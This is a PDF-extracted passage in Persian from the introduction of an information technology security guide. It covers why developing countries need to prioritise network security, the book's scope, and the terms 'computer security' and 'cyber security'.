‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﺍﺳـﺖ‪ ،‬ﻭ ﮔﺮﻭﻫﻬـﺎﻳﻲ ﻛـﻪ‬
‫ﻻ ﺩﺭ ﻓﻬـﻢ ﭼﮕـﻮﻧﮕﻲ‬
‫ﺍﺻﻮﻝ ﺍﺳﺎﺳﻲ ﺭﺍ ﺩﺭﻙ ﻛﺮﺩﻩﺍﻧﺪ ﻧﻴﺰ ﻣﻌﻤﻮ ﹰ‬
‫ﺳﺎﺯﮔﺎﺭﺳﺎﺯﻱ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﻓﻨـﻲ ﺑـﺎ ﺷـﺮﺍﻳﻂ ﻣﺘﻐﻴـﺮ ﻭ ﻏﻴﺮﻗﺎﺑـﻞ‬
‫ﻲ ﺍﻳﻦ ﻣﺤﻴﻂ ﻣﺸﻜﻞ ﺩﺍﺭﻧﺪ‪.‬‬
‫ﭘﻴﺶﺑﻴﻨ ﹺ‬
‫ﺧﺪﻣﺎﺕ ﭘﺲ ﺍﺯ ﻓـﺮﻭﺵ ﺩﺭ ﮔﺬﺷـﺘﻪ ﺑـﺼﻮﺭﺕ ﻧﺎﻣﺤـﺪﻭﺩ ﺑـﺮﺍﻱ‬
‫ﺭﺍﻳﺎﻧﻪ ﻫﺎﻳﻲ ﻛﻪ ﻛـﻢﺗﻌـﺪﺍﺩ ﻭ ﮔﺮﺍﻧﻘﻴﻤـﺖ ﺑﻮﺩﻧـﺪ ﺩﺭﻧﻈـﺮ ﮔﺮﻓﺘـﻪ‬
‫ﻣﻲﺷﺪ؛ ﺍﻣﺎ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺣﺠﻢ ﺍﻧﺒـﻮﻩ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﺩﺭ‬
‫ﺑﺎﺯﺍﺭ ﻧﻤﻲﺗﻮﺍﻥ ﺑﺴﺎﺩﮔﻲ ﭼﻨﻴﻦ ﺧﺪﻣﺎﺗﻲ ﺭﺍ ﺍﺭﺍﺋﻪ ﻛﺮﺩ‪ .‬ﻓﺮﻭﺷﮕﺎﻫﻬﺎ‬
‫ﻻ ﺍﺯ ﻣـﺸﻜﻼﺗﻲ ﻛـﻪ ﺩﺭ‬
‫ﻭ ﻣﺮﺍﻛﺰ ﺧﺪﻣﺎﺕ ﺗﻌﻤﻴﺮﺍﺕ ﺭﺍﻳﺎﻧﻪ ﻣﻌﻤـﻮ ﹰ‬
‫ﺳﺎﻳﺮ ﻧﻘﺎﻁ ﺩﻧﻴﺎ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﻨﺪ ﻣﻄﻠﻊ ﻧﻴﺴﺘﻨﺪ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻛﺎﺭﺑﺮﺍﻥ‬
‫ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﺑﻪ ﻗﺮﺑﺎﻧﻴـﺎﻥ ﺗﻮﺳـﻌﺔ ﺍﻃﻼﻋـﺎﺕ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺍﻣﻨﻴـﺖ‬
‫ﻓﻨﺎﻭﺭﻱ ﺗﺒﺪﻳﻞ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﻧﻘﺺ ﺍﻣﻨﻴﺘﻲ ﺷﺒﻜﻪ ﺩﺭ ﻫﻤﺔ ﻛﺸﻮﺭﻫﺎ ﺍﺗﻔـﺎﻕ ﻣـﻲﺍﻓﺘـﺪ ﻭ ﺣﺘـﻲ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻮﺟﺐ ﺗﺤﺖ ﻓﺸﺎﺭ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺩﻭﻟﺘﻬﺎ ﻧﻴﺰ ﺑﮕـﺮﺩﺩ‪.‬‬
‫ﻻ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﻧﻘﺼﻬﺎ ﮔﺰﺍﺭﺵ ﻧﻤﻲﺷﻮﻧﺪ؛ ﭼﺮﺍﻛﻪ ﺍﻃﻼﻉ‬
‫ﻣﻌﻤﻮ ﹰ‬
‫‪Help Centers‬‬
‫‪11‬‬
‫ﻋﻤﻮﻡ ﻣﺮﺩﻡ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺘﺎﻳﺞ ﻧﺎﻣﻄﻠﻮﺑﻲ ﺑﻪ ﺑﺎﺭ ﺁﻭﺭﺩ‪ .‬ﺩﻭﻟﺘﻬﺎ‬
‫ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻋﻤﻮﻣﹰﺎ ﺗﻮﺍﻧـﺎﻳﻲ‬
‫ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﭼﻨﻴﻦ ﻧﻘﺼﻬﺎﻳﻲ ﺭﺍ ﺩﺍﺭﻧﺪ‪ ،‬ﻭﻟـﻲ ﻧﺘـﺎﻳﺞ ﻧﺎﺷـﻲ ﺍﺯ ﺑـﺮﻭﺯ‬
‫ﻧﻘــﺼﻬﺎ ﻭ ﺍﺷــﻜﺎﻻﺕ ﺍﻣﻨﻴﺘــﻲ ﺩﺭ ﻛــﺸﻮﺭﻫﺎﻱ ﺩﺭﺣــﺎﻝ ﺗﻮﺳــﻌﻪ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﻭﺧﻴﻢﺗﺮ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺩﺭ ﻛﻨﺎﺭ‬
‫ﻫﻤﺔ ﺍﻳﻦ ﻣﻮﺍﺭﺩ‪ ،‬ﺑﺎﺯﺍﺭﻫﺎ‪ ،‬ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﺩﻭﻟﺘﻬﺎﻱ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ‬
‫ﺗﻮﺳﻌﻪ ﺑﻪ ﺩﻟﻴـﻞ ﻋـﺪﻡ ﺗﻮﺟـﻪ ﺑـﻪ ﻋﻮﺍﻗـﺐ ﻧﺎﺷـﻲ ﺍﺯ ﻧﻔﻮﺫﻫـﺎﻱ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﺣﺠﻢ ﻭﺳﻴﻊ‪ ،‬ﻋﺪﻡ ﺗﻮﺍﻧﺎﻳﻲ ﺗﺤﻠﻴﻞ ﺿـﺮﺭﻫﺎﻱ ﻣـﺎﻟﻲ‬
‫ﻧﺎﺷﻲ ﺍﺯ ﺍﻳﻦ ﺣﻤﻼﺕ‪ ،‬ﻭ ﻧﻴﺰ ﻧﺪﺍﺷﺘﻦ ﺗﺨﻤﻴﻦ ﻣﻨﺎﺳـﺐ ﺍﺯ ﺯﻣـﺎﻥ‬
‫ﻻﺯﻡ ﺑﺮﺍﻱ ﺗﺮﻣﻴﻢ ﺧﺴﺎﺭﺍﺕ ﻭﺍﺭﺩﻩ )ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﺍﻳﻦ ﺧﺴﺎﺭﺍﺕ ﻗﺎﺑﻞ ﺗﺮﻣﻴﻢ‬
‫ﺑﺎﺷﻨﺪ( ﺗﻤﺎﻳﻞ ﭼﻨﺪﺍﻧﻲ ﺑﻪ ﺭﻓﻊ ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﻧﺪﺍﺭﻧﺪ‪.‬‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺑﺎﻳﺪ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﻌﻨـﻮﺍﻥ ﺍﻭﻟﻮﻳـﺖ‬
‫ﺍﺻﻠﻲ ﺧﻮﺩ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻧﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﺧﻄـﺮ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺗﺒﻬﻜﺎﺭﺍﻧـﻪ‬
‫ﺑﻴﺸﺘﺮ ﻣﺘﻮﺟﻪ ﻣﻜﺎﻧﻬﺎﻳﻲ ﺍﺳﺖ ﻛـﻪ ﺍﺯ ﻛﻨﺘـﺮﻝ ﻛـﺎﻓﻲ ﺑﺮﺧـﻮﺭﺩﺍﺭ‬
‫ﻧﺒﻮﺩﻩ ﻭ ﻧﺎﺍﻣﻦ ﻫﺴﺘﻨﺪ‪ .‬ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻳﻲ ﻛـﻪ‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺁﻧﻬـﺎ ﻛﻤﺘـﺮ ﺗـﺄﻣﻴﻦ ﺷـﺪﻩ ﺍﻫـﺪﺍﻑ‬
‫ﺟﺬﺍﺏﺗﺮﻱ ﺑـﺮﺍﻱ ﺣﻤﻠـﻪ ﻫـﺴﺘﻨﺪ‪ .‬ﻛـﺪﺍﻡ ﺳـﺎﺯﻣﺎﻥ ﻛﻮﭼـﻚ ﻳـﺎ‬
‫ﻣﺘﻮﺳﻂ ﺍﺳﺖ ﻛﻪ ﻋﻠﻴﺮﻏﻢ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻦ ﺍﻃﻼﻋـﺎﺕ ﻣﺤﺮﻣﺎﻧـﺔ‬
‫ﻣﺸﺘﺮﻳﺎﻥ‪ ،‬ﻓﺎﻳﻠﻬﺎﻱ ﺗﺠـﺎﺭﻱ ﻭ ﻳـﺎ ﺩﺳـﺘﻜﺎﺭﻱ ﺷـﺪﻥ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻛﻠﻴﺪﻱ ﺳـﺎﺯﻣﺎﻥ ﻫﻤﭽﻨـﺎﻥ ﺑﺘﻮﺍﻧـﺪ ﭘﺎﺑﺮﺟـﺎ ﺑﻤﺎﻧـﺪ؟ ﻛـﺸﻮﺭﻫﺎﻱ‬
‫ﻲ ﺁﻣـﻮﺯﺵﺩﻳـﺪﻩ ﻭ‬
‫ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﻪ ﺑﺎﻳـﺪ ﻇﺮﻓﻴـﺖ ﻣﻨـﺎﺑﻊ ﺍﻧـﺴﺎﻧ ﹺ‬
‫ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺧﻮﺩ ﺭﺍ ﺑﻬﺒﻮﺩ ﺑﺨﺸﻨﺪ ﺗـﺎ ﺍﻫـﺪﺍﻑ ﺁﺳـﺎﻧﻲ‬
‫ﺑﺮﺍﻱ ﺣﻤﻠﺔ ﺗﺒﻬﻜﺎﺭﺍﻥ ﻓﻀﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﺒﺎﺷـﻨﺪ‪ .‬ﺩﺭ ﺍﻳـﻦ ﻛﺘـﺎﺏ‬
‫ﺑﺤﺜﻬﺎﻱ ﺑﺴﻴﺎﺭﻱ ﺩﺭﺑﺎﺭﺓ ﻣﺎﻫﻴﺖ ﻣﻮﺿـﻮﻉ ﺍﻣﻨﻴـﺖ ﻣﻄـﺮﺡ ﺷـﺪﻩ‬
‫ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﻪ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺩﻳﺪﮔﺎﻩﻫﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ‬
‫ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﺩﺍﺩﻩﻫﺎ ﻧﮕﺮﺍﻧﻲ ﺩﺍﺭﻧـﺪ ﺑـﻪ ﺍﻳـﻦ‬
‫ﻣــﺴﺌﻠﻪ ﺑﻌﻨــﻮﺍﻥ ﻳــﻚ ﻣﻮﺿــﻮﻉ ﺩﺭ ﺣــﻮﺯﺓ ﺍﻣﻨﻴــﺖ ﺍﻃﻼﻋــﺎﺕ‬
‫ﻲ ﺫﺧﻴـﺮﻩ ﻭ ﺍﺭﺳـﺎﻝ‬
‫ﻣﻲﻧﮕﺮﻧﺪ؛ ﻛـﺴﺎﻧﻴﻜﻪ ﺑـﺎ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻱ ﻓﻨـ ﹺ‬
‫ﺍﻃﻼﻋﺎﺕ ﺳﺮ ﻭ ﻛﺎﺭ ﺩﺍﺭﻧﺪ ﺍﻳﻦ ﻣﺒﺤﺚ ﺭﺍ ﺍﺯ ﺩﻳﺪ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﻭ‬
‫ﺷﺒﻜﻪ ﻣﻲ ﺑﻴﻨﻨﺪ؛ ﺣﺎﻝ ﺁﻧﻜﻪ ﺩﻳﮕﺮﺍﻧﻲ ﻛـﻪ ﺑـﻪ ﺗﺠـﺎﺭﺕ ﻣـﺸﻐﻮﻝ‬
‫ﻫﺴﺘﻨﺪ ﺑﻪ ﺁﻥ ﺑﻌﻨﻮﺍﻥ ﻳـﻚ ﺣـﻮﺯﺓ ﺟﺪﻳـﺪ ﺩﺭ ﺗﺠـﺎﺭﺕ ﻭ ﻋﻤﻮﻣـﹰﺎ‬
‫ﺗﺤﺖ ﻋﻨﻮﺍﻥ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﮕﺎﻩ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﻣﺎ ﺗﺮﺟﻴﺢ ﺩﺍﺩﻩﺍﻳﻢ ﺗﻤﺎﻡ ﻣﺒـﺎﺣﺜﻲ ﻛـﻪ ﺩﺭ‬
‫ﻣﻘﻮﻟﻪ "ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ" ﻣﻲﮔﻨﺠـﺪ ﺭﺍ ﺍﺭﺍﺋـﻪ ﻛﻨـﻴﻢ ﻭ ﺍﺯ‬
‫ﺍﻳﻦ ﻃﺮﻳﻖ ﺑﻪ ﺗﻤﺎﻣﻲ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺫﺧﻴﺮﻩ ﻭ ﭘـﺮﺩﺍﺯﺵ ﻭ ﺍﺭﺳـﺎﻝ‬
‫ﺍﻃﻼﻋﺎﺕ‪ ،‬ﺳﺨﺖﺍﻓﺰﺍﺭ‪ ،‬ﻧﺮﻡﺍﻓﺰﺍﺭ‪ ،‬ﻭ ﺗﺴﻬﻴﻞ ﺍﺭﺗﺒﺎﻃـﺎﺕ‪ ،‬ﺑـﺎ ﻳـﻚ‬
‫ﻧﮕﺎﻩ ﻭﻳﮋﻩ ﺑﻪ ﻣﺴﺌﻠﻪ ﺍﻣﻨﻴﺖ ﺧﻮﺩ ﺍﻃﻼﻋﺎﺕ ﺑﭙﺮﺩﺍﺯﻳﻢ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ‬
‫‪١٦‬‬
‫ﺣﺎﺋﺰ ﺍﻫﻤﻴـﺖ ﺍﺳـﺖ ﻛـﻪ ﻫـﻢ ﺍﻃﻼﻋـﺎﺕ ﻭ ﻫـﻢ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻱ‬
‫ﭘﺮﺩﺍﺯﺵ ﺁﻥ ﺑﺎﻳﺪ ﺍﺯ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻣﺼﻮﻥ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﻣﺎ ﺗﻌﻤﺪﹰﺍ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺗﻮﺟﻪ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ‪ ،‬ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﻭ‬
‫ﺷﺒﻜﻪﻫﺎ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻩﺍﻳﻢ؛ ﭼﺮﺍﻛﻪ ﻣﻨﺎﺑﻊ ﻏﻨﻲ ﻭ ﻣﺘﻌـﺪﺩﻱ ﺑـﺮﺍﻱ‬
‫ﺁﮔﺎﻫﻲ ﺍﺯ ﺟﺰﺋﻴﺎﺕ ﻣﺴﺎﺋﻞ ﺩﻳﮕﺮ ﻧﻈﻴﺮ ﺗﻠﻔﻦ ﺛﺎﺑﺖ ﻭ ﻫﻤﺮﺍﻩ ﻛﻪ ﺩﺭ‬
‫ﺍﺭﺗﺒﺎﻁ ﺗﻨﮕﺎﺗﻨﮓ ﺑﺎ ﺍﻳـﻦ ﻣـﺴﺎﺋﻞ ﻫـﺴﺘﻨﺪ ﻭ ﺩﺭ ﺍﻳﻨﺠـﺎ ﺑـﻪ ﺁﻧﻬـﺎ‬
‫ﭘﺮﺩﺍﺧﺘﻪ ﻧﺸﺪﻩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺑﺎ ﻧﺰﺩﻳﻜﺘﺮ ﺷﺪﻥ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺗﻠﻔﻨـﻲ ﻭ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻪ ﻳﻜﺪﻳﮕﺮ‪ ،‬ﭼﻨﻴﻦ ﻣﺴﺎﺋﻠﻲ ﻧﻴﺰ ﺍﻫﻤﻴﺖ ﺑﻴـﺸﺘﺮﻱ ﭘﻴـﺪﺍ‬
‫ﻣــﻲﻛﻨﻨــﺪ‪ .‬ﺑــﺎ ﭘﻴــﺪﺍﻳﺶ‪ Voice over IP‬ﻭ ‪،ENUM‬‬
‫ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﺗﻠﻔﻦ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻧﻴﺰ ﻛﺎﺭﺑﺮﺩ ﺭﻭﺯﺍﻓﺰﻭﻧﻲ ﻣﻲﻳﺎﺑﻨﺪ ﻭ ﺑـﺎ‬
‫ﭘﻴﺪﺍﻳﺶ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ‪ 3G‬ﺑﺘﺪﺭﻳﺞ ﺑﻪ ﻣـﺴﺎﺋﻠﻲ ﭼـﻮﻥ ﺍﻣﻨﻴـﺖ ﺩﺭ‬
‫ﺁﻧﻬﺎ ﻧﻴﺰ ﺑﺎﻳﺪ ﺗﻮﺟﻪ ﻛﺮﺩ‪.‬‬
‫ﺍﻳﻦ ﻛﺘﺎﺏ ﺑـﻪ ﻧﺤـﻮﻱ ﺗـﺪﻭﻳﻦ ﺷـﺪﻩ ﻛـﻪ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ‬
‫ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻧﻴﺰ ﺑﺎ ﻫﺰﻳﻨﻪﺍﻱ ﺍﻧﺪﻙ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﺎﺷﺪ‪ .‬ﻫﺪﻑ ﺍﺯ‬
‫ﺍﻧﺘﺸﺎﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﻳﻦ ﻧﻴﺴﺖ ﻛﻪ ﺑﻪ ﺗﻴـﺮﺍﮊ ﺑـﺎﻻﻳﻲ ﺍﺯ ﺁﻥ ﺩﺳـﺖ‬
‫ﻳﺎﺑﻴﻢ‪ ،‬ﺑﻠﻜﻪ ﺑﻨﺎ ﺑﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﻔﺎﺩ ﻛﺘﺎﺏ ﺩﺭ ﻳﻚ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ‬
‫ﺟﻬﺎﻧﻲ ﺍﺭﺍﺋﻪ ﮔﺮﺩﺩ ﻛﻪ ﺍﺯ ﺩﻭ ﻟﺤﺎﻅ ﭘﻮﻳﺎ ﺑﺎﺷﺪ‪ :‬ﺍﻭﻝ ﺍﻳﻨﻜﻪ ﻣﻄﺎﻟﺐ‬
‫ﺁﻥ ﺗﺎ ﺣﺪ ﺍﻣﻜﺎﻥ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲﺷﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﻭ ﺩﻭﻡ ﺍﻳﻨﻜﻪ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻣﻔﻴﺪ ﻭ ﻣﻨﺎﺳﺒﻲ ﺑﻪ ﺧﻮﺍﻧﻨﺪﮔﺎﻧﻲ ﻛـﻪ ﺑـﺪﻧﺒﺎﻝ ﻛـﺴﺐ ﺍﻃﻼﻋـﺎﺗﻲ‬
‫ﺩﺭﺑﺎﺭﺓ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻫﺴﺘﻨﺪ ﺍﺭﺍﺋﻪ ﻛﻨﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺧﻮﺍﻧﻨﺪﻩ ﺑﺎﻳﺪ ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻣﺆﻟﻔﻴﻦ ﺑﺮﺍﻱ ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﻭ‬
‫ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﺍﺻﻄﻼﺣﺎﺕ ﻣﺨﺘﻠﻔﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﻛـﺮﺩﻩﺍﻧـﺪ‪ .‬ﺑﻄـﻮﺭ ﻛﻠـﻲ‬
‫ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﻣﻮﺿﻮﻋﺎﺕ ﺯﻳﺮ ﺍﺷﺎﺭﻩ ﺩﺍﺭﺩ‪:‬‬
‫‪ (۱‬ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ‪ :‬ﺍﻣﻨﻴﺖ ﺍﺯ ﻧﻈﺮ ﻓﻨﻲ ﺩﺭ ﻣﺎﺷﻴﻨﻬﺎ‪ ،‬ﻧﺮﻡﺍﻓـﺰﺍﺭ‪،‬‬
‫ﺩﺍﺩﻩﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ‪ .‬ﺍﺯ ﺍﻳﻦ ﺍﺻـﻄﻼﺡ ﺑﻴـﺸﺘﺮ ﺩﺭ ﺑﺨـﺸﻬﺎﻱ‬
‫ﺩﻭﻡ ﻭ ﭘــﻨﺠﻢ ﺍﺳــﺘﻔﺎﺩﻩ ﺷــﺪﻩ ﻛــﻪ ﺑﻴــﺸﺘﺮ ﺑــﺮ ﺭﻭﻱ ﺍﺑﻌــﺎﺩ‬
‫ﻓﻴﺰﻳﻜﻲ‪ ،‬ﺯﻳﺮﺳﺎﺧﺘﻲ ﻭ ﻓﻨﻲ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺗﺄﻛﻴﺪ ﺩﺍﺭﻧﺪ‪.‬‬
‫‪ (۲‬ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ‪ :١٢‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭﺍﺑـﺴﺘﻪ ﺑـﻪ‬
‫ﺳﻴﺎﺳﺖ ﺩﻭﻟﺘﻬﺎ‪ .‬ﺍﻳﻦ ﺍﺻـﻄﻼﺡ ﻋﻤﻮﻣـﹰﺎ ﺗﻮﺳـﻂ ﻣﺆﺳـﺴﺎﺕ‬
‫ﺩﻭﻟﺘﻲ ﻭ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﻣﻠﻲ ﺩﺭ ﺍﺳﻨﺎﺩ‪ ،‬ﻗﻮﺍﻧﻴﻦ ﻭ ﭘﺮﻭﮊﻩﻫﺎﻱ‬
‫ﺗﺤﻘﻴﻘﺎﺗﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﺷﻮﺩ ﻭ ﻛﻤﺎﺑﻴﺶ ﻣﺘﺮﺍﺩﻑ ﺑﺎ "ﺍﻣﻨﻴـﺖ‬
‫ﺍﻳﻨﺘﺮﻧﺖ" ﺍﺳﺖ )ﺍﺻﻄﻼﺣﻲ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺑـﻪ ﺁﻥ ﺍﺷـﺎﺭﻩ ﺍﻱ‬
‫ﻧﺸﺪﻩ‪ ،‬ﺍﻣﺎ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺩﺭ ﻣﺮﺍﺟﻊ ﺩﻳﮕﺮ ﺑﻪ ﭼﺸﻢ ﻣﻲﺧﻮﺭﺩ(‪ .‬ﻫـﺮ ﺩﻭ‬
‫ﻋﺒﺎﺭﺕ ﺑﻪ ﺟﻮﺍﻧﺐ ﺍﻣﻨﻴﺖ ﺷـﺒﻜﻪ ﻭ ﺍﺻـﻮﻝ ﺳﻴﺎﺳـﺘﮕﺬﺍﺭﻱ‬
‫ﺷﺒﻜﻪﻫﺎ ﻣﺜﻞ ﺗﻌﺮﻳـﻒ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ‪ ،‬ﺟـﺮﺍﺋﻢ ﺳـﺎﻳﺒﺮ‪،‬‬
‫ﺗﺠﺎﺭﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺟﻬﺎﻧﻲ ﺍﺷﺎﺭﻩ ﺩﺍﺭﻧـﺪ‪ .‬ﺗﻔـﺎﻭﺕ ﺍﻳـﻦ ﺩﻭ‬
‫ﺍﺻــﻄﻼﺡ ﭼﻨــﺪﺍﻥ ﺯﻳــﺎﺩ ﻧﻴــﺴﺖ؛ ﺑﻠﻜــﻪ ﻫﻤــﺎﻧﻄﻮﺭ ﻛــﻪ ﺩﺭ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﺼﻠﻬﺎﻱ ﺍﻳﻦ ﻛﺘـﺎﺏ ﻣـﻲ ﺗـﻮﺍﻥ ﺩﻳـﺪ‪ ،‬ﺍﻣﻨﻴـﺖ‬
‫ﺭﺍﻳﺎﻧﻪ ﻫﺎ‪ ،‬ﺷﺒﻜﻪ ﻫﺎ ﻭ ﺩﺍﺩﻩﻫـﺎ ﺗـﺎ ﺣـﺪ ﺯﻳـﺎﺩﻱ ﺑـﺎ ﻣﻔـﺎﻫﻴﻢ‬
‫ﺭﻭﺯﻣﺮﺓ ﺍﻣﻨﻴﺖ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺑﻪ ﻫﻢ ﮔﺮﻩ ﺧﻮﺭﺩﻩﺍﻧﺪ‪.‬‬
‫ﻣﻄﺎﻟﺐ ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﻪ ﭘـﻨﺞ ﺑﺨـﺶ ﻣﺨﺘﻠـﻒ ﺗﻘـﺴﻴﻢ ﺷـﺪﻩ ﻛـﻪ‬
‫ﻫﺮﻳﻚ ﻣﻨﺎﺳﺐ ﮔﺮﻭﻩ ﺧﺎﺻﻲ ﺍﺯ ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﻫﺴﺘﻨﺪ‪ .‬ﻻﺯﻡ ﺑﻪ ﺫﻛﺮ‬
‫ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻛﺘﺎﺏ ﮔﺎﻫﻲ ﻣـﻲﺗـﻮﺍﻥ ﻣﻄﺎﻟـﺐ‬
‫ﻣﺸﺘﺮﻙ ﻭ ﺗﻜﺮﺍﺭﻱ ﭘﻴـﺪﺍ ﻛـﺮﺩ‪ ،‬ﭼﺮﺍﻛـﻪ ﺑـﺎ ﺍﻳﻨﻜـﺎﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﻨﻬﺎ ﺑﺨـﺸﻲ ﺍﺯ ﻛﺘـﺎﺏ ﺭﺍ ﺑـﺮﺍﻱ ﺧﻮﺍﻧـﺪﻥ‬
‫ﺍﻧﺘﺨﺎﺏ ﻛﻨﻨﺪ ﻛﻪ ﺑﻪ ﻛﺎﺭ ﺁﻧﻬﺎ ﻣﻲﺁﻳﺪ‪ .‬ﺑﻌﻀﻲ ﺑﺨﺸﻬﺎ ‪ -‬ﺧـﺼﻮﺻﹰﺎ‬
